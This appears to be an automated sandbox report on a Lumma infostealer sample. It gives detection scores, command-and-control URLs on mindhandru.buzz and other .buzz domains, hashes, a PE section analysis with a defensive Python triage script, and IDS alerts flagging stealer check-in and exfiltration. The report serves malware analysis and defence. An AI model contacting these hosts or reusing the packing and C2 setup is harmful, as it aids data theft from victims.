              ARoqFi68Nr.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba
              ARoqFi68Nr.exe | 52% | Virustotal |
              ARoqFi68Nr.exe | 100% | Avira | TR/Crypt.TPM.Gen
              ARoqFi68Nr.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              Source | Detection | Scanner | Label
              https://mindhandru.buzz/yW | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/o | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/g | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/piO | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/apiz | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/K7 | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/W | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/piw | 100% | Avira URL Cloud | malware
              https://mindhandru.buzz/apiulti | 100% | Avira URL Cloud | malware
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              mindhandru.buzz | 104.21.11.101 | true | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              scentniej.buzz | false | | high
              rebuildeso.buzz | false | | high
              appliacnesot.buzz | false | | high
              screwamusresz.buzz | false | | high
              cashfuzysao.buzz | false | | high
              inherineau.buzz | false | | high
              prisonyfork.buzz | false | | high
              hummskitnj.buzz | false | | high
              mindhandru.buzz | false | | high
              https://mindhandru.buzz/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/ | ARoqFi68Nr.exe, 00000000.00000003.1389987289.000000000567F000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389634246.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388658686.0000000005675000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/yW | ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/o | ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/pi | ARoqFi68Nr.exe, 00000000.00000003.1526898890.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1530600303.0000000001151000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/piO | ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/g | ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/K7 | ARoqFi68Nr.exe, 00000000.00000002.1600312441.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596881692.0000000005679000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/apiz | ARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.micro | ARoqFi68Nr.exe, 00000000.00000003.1505392610.000000000111F000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596864489.0000000001128000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mindhandru.buzz/W | ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/apiulti | ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://mindhandru.buzz/piw | ARoqFi68Nr.exe, 00000000.00000003.1544388931.0000000001151000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.11.101 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581229
Start date and time: 2024-12-27 08:51:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ARoqFi68Nr.exe (renamed because the original name is a hash value)
Original Sample Name: d867e39681dbe1564bcdd21d773e668b.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ARoqFi68Nr.exe, PID 7380, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:52:45 | API Interceptor | 8x Sleep call for process: ARoqFi68Nr.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.11.101 | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar
| Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
| IERiUft8Wi.exe | malicious | LummaC
| zi042476Iv.exe | malicious | LummaC
| C8FtVPhuxd.exe | malicious | LummaC
| 0zBsv1tnt4.exe | malicious | LummaC
| cqHMm0ykDG.exe | malicious | LummaC
| b0ho5YYSdo.exe | malicious | LummaC
| ZX2M0AXZ56.exe | malicious | LummaC
| 0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mindhandru.buzz | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
| PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
| 7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
| IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
| oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
| zi042476Iv.exe | malicious | LummaC | 172.67.165.185
| C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
| U7TAniYFeK.exe | malicious | LummaC | 172.67.165.185
| 0zBsv1tnt4.exe | malicious | LummaC | 104.21.11.101
| cqHMm0ykDG.exe | malicious | LummaC | 104.21.11.101
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | 104.21.11.101
| Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
| PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
| 7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
| IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
| oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
| zi042476Iv.exe | malicious | LummaC | 104.21.11.101
| C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
| U7TAniYFeK.exe | malicious | LummaC | 172.67.165.185
| aD7D9fkpII.exe | malicious | Vidar | 172.64.41.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
| PH1D3KHmOD.exe | malicious | LummaC | 104.21.11.101
| 7jKx8dPOEs.exe | malicious | LummaC | 104.21.11.101
| IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
| oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
| zi042476Iv.exe | malicious | LummaC | 104.21.11.101
| C8FtVPhuxd.exe | malicious | LummaC | 104.21.11.101
| U7TAniYFeK.exe | malicious | LummaC | 104.21.11.101
| 8lOT1rXZp5.exe | malicious | RedLine | 104.21.11.101
| 6wFwugeLNG.exe | malicious | LummaC | 104.21.11.101
                                                                                              No context
                                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.5697397837698075
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ARoqFi68Nr.exe
File size: 2'935'296 bytes
MD5: d867e39681dbe1564bcdd21d773e668b
SHA1: c8c855e1ff585fdf76e7bb28001fa025a0b201cb
SHA256: d0003288a5022dd1f2af3d6aaec3236c57163e5884cc24909d9175de96c0d734
SHA512: a0de86b5035e62714d61533882b1de275297e9d617a624b7e39460ae3f563c1c17d3e4fe01ff360b9c3c01ac0db44c9860758230d83c0f1551df143d156d5e6a
SSDEEP: 49152:j76vIzjLjYeJMNngheJOhchADRWuNUPcyw2A/coYkrP:juvIzjLjYeJMNnghEOhchsRWuORkP
TLSH: 1BD52BD2FD0972CFD4CA26789427CD86A95E06F50B2289D3F86CA5797E63CC221B5C34
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.......,...@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6f9000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint Preview (0x6f9000, section .taggant)
Only the first jmp is real code; the lines that follow are the linear disassembly of the mostly zero-filled bytes after it (the byte pair 00 00 decodes as add byte ptr [eax], al), which is why the listing looks like padding rather than a prologue.
Instruction
jmp 00007F9F090F286Ah
push gs
sub al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F9F090F4865h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Data Directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x52000 | 0x26400 | 1f7c614c14fbc39ed3754a5c7c7f29de | False | 0.9996297998366013 | data | 7.981577934195685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
trvrqxmv | 0x55000 | 0x2a3000 | 0x2a2e00 | 65f4a8b620ba5b3361938f80b0132b0c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fllfikzu | 0x2f8000 | 0x1000 | 0x400 | 615bc7e0bf88790d7b1b4b59d812f3ed | False | 0.80078125 | data | 6.283066512732298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2f9000 | 0x3000 | 0x2200 | 9147a3742f39cb35b3c41fbf9a5b8067 | False | 0.05330882352941176 | DOS executable (COM) | 0.6268345437999209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports
DLL | Import
kernel32.dll | lstrcpy
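The section table above is where the packer shows itself before the sample is even run: the entry point is in the last section (.taggant) rather than in a code section, four of six sections are mapped writable and executable, the unnamed first section is essentially incompressible (entropy 7.98, ZLIB complexity 0.9996) and has far more virtual than raw space, and the only import is kernel32!lstrcpy. The script below is an added triage example written for this page, not Joe Sandbox code: it transcribes the table, applies the documented IMAGE_SCN_* flag values from winnt.h, and derives those indicators. The entropy threshold, the page-alignment assumption and the set of "standard" section names are the example's own choices.

```python
"""Static triage of the PE section table as printed in the report (added example)."""
import hashlib

# IMAGE_SCN_* flag values from winnt.h
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

IMAGE_BASE = 0x400000
ENTRY_POINT = 0x6F9000       # ImageBase + AddressOfEntryPoint, as the report prints it
SECTION_ALIGNMENT = 0x1000   # assumption: the report does not print SectionAlignment; 0x1000 is the usual value

# (name, virtual address, virtual size, raw size, MD5 of raw bytes, entropy, characteristics)
# transcribed from the report's section table; entropy None = the report printed "unknown"
SECTIONS = [
    ("",         0x1000,   0x52000,  0x26400,  "1f7c614c14fbc39ed3754a5c7c7f29de", 7.981577934195685,  RWX),
    (".rsrc",    0x53000,  0x1000,   0x0,      "d41d8cd98f00b204e9800998ecf8427e", 0.0,                RW),
    (".idata",   0x54000,  0x1000,   0x200,    "39a711a7d804ccbc2a14eea65cf3c27e", 1.0789976601211375, RW),
    ("trvrqxmv", 0x55000,  0x2a3000, 0x2a2e00, "65f4a8b620ba5b3361938f80b0132b0c", None,               RWX),
    ("fllfikzu", 0x2f8000, 0x1000,   0x400,    "615bc7e0bf88790d7b1b4b59d812f3ed", 6.283066512732298,  RWX),
    (".taggant", 0x2f9000, 0x3000,   0x2200,   "9147a3742f39cb35b3c41fbf9a5b8067", 0.6268345437999209, RWX),
]

# Names a linker emits by default; anything else (random names, an empty name, the .taggant
# marker added by packers that participate in the IEEE Taggant System) is worth a look.
STANDARD_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def section_for_rva(rva):
    """Name of the section whose virtual range contains rva, or None if rva falls in the headers or a gap."""
    for name, va, vsize, *_ in SECTIONS:
        if va <= rva < va + max(vsize, SECTION_ALIGNMENT):
            return name
    return None


def entry_section():
    """Section that owns the entry point (the report's 'Entrypoint Section' field)."""
    return section_for_rva(ENTRY_POINT - IMAGE_BASE)


def rwx_sections():
    """Sections that are both writable and executable: the layout self-modifying unpacker stubs need."""
    mask = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [s[0] for s in SECTIONS if s[6] & mask == mask]


def packer_indicators(entropy_threshold=7.5):
    """Collect the table-level hints that the real code is unpacked at runtime."""
    high_entropy = [s[0] for s in SECTIONS if s[5] is not None and s[5] >= entropy_threshold]
    # More than one page of virtual space beyond what exists on disk: room for the unpacked image.
    unpack_room = [s[0] for s in SECTIONS if s[2] - s[3] > SECTION_ALIGNMENT]
    odd_names = [s[0] for s in SECTIONS if s[0] not in STANDARD_NAMES]
    return {
        "entry_in_last_section": entry_section() == SECTIONS[-1][0],
        "rwx": rwx_sections(),
        "high_entropy": high_entropy,
        "unpack_room": unpack_room,
        "non_standard_names": odd_names,
    }


def empty_on_disk(name):
    """True if the report's MD5 for `name` is the MD5 of zero bytes, i.e. the section has no raw data."""
    md5 = next(s[4] for s in SECTIONS if s[0] == name)
    return md5 == hashlib.md5(b"").hexdigest()


if __name__ == "__main__":
    print("entry point in section:", repr(entry_section()))
    for k, v in packer_indicators().items():
        print(f"{k}: {v}")
    print(".rsrc empty on disk:", empty_on_disk(".rsrc"))
```

The unnamed section is the one to watch in a debugger: it is the only one with both near-maximal entropy and about 0x2BC00 bytes of uninitialised virtual space, which is consistent with the "changes PE section rights" unpacking behaviour the report flags. Note that the MD5 printed for .rsrc is the hash of the empty string, so the section exists in the header only.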
Suricata IDS Alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T08:52:45.545108+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:46.304703+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:46.304703+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:47.713609+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:48.566284+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:48.566284+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49702 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:50.224169+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 104.21.11.101 | 443 | TCP
2024-12-27T08:52:51.263028+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49703 | 104.21.11.101 | 443 | TCP
